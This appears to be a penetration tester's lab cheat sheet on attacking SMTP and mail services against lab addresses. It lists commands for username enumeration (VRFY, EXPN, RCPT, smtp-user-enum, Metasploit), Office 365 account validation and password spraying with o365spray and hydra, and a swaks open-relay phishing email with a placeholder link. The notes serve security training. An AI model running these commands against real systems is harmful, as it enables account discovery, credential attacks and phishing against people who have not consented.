SMTP (25,465,587)

Username enumeration (VRFY command)

rednorth@htb[/htb]$ telnet 10.129.14.128 25 
Trying 10.129.14.128... 
Connected to 10.129.14.128. 
Escape character is '^]'. 
220 ESMTP Server  
VRFY root 
252 2.0.0 root

Username bruteforce

Using smtp-user-enum

smtp-user-enum -M VRFY -U users.txt -t 10.129.42.195

Using metasploit (better to use if high response time)

msfconsole
use scanner/smtp/smtp_enum
set RHOSTS $ip
set USER_FILE /home/rednorth/users.txt
run

Footprinting using nmap (includes smtp-commands in nse)

nmap 10.129.14.128 -sC -sV -p25

Open relay using nmap

nmap 10.129.14.128 -p25 --script smtp-open-relay -v

Notes:

port 25 - (server-to-server communication) port 587 - newer (client-to-server communication); starts with STARTTLS so its more secure than port 25 port 465 - smtps

Misconfigurations

Authentication

Username Enumeration

VRFY john

EXPN john

RCPT TO:john

SMTP User Enum

-M is mode [VRFY, EXPN, RCPT] -D depends on the server configuration if it needs a domain

$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

Cloud Enumeration

$ python3 o365spray.py --validate --domain msplaintext.xyz

Password Attacks

$ hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

$ python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

o365spray or MailSniper for Microsoft Office 365 or CredKing for Gmail or Okta

Protocol Specific Attacks

Open relay

# nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
# swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213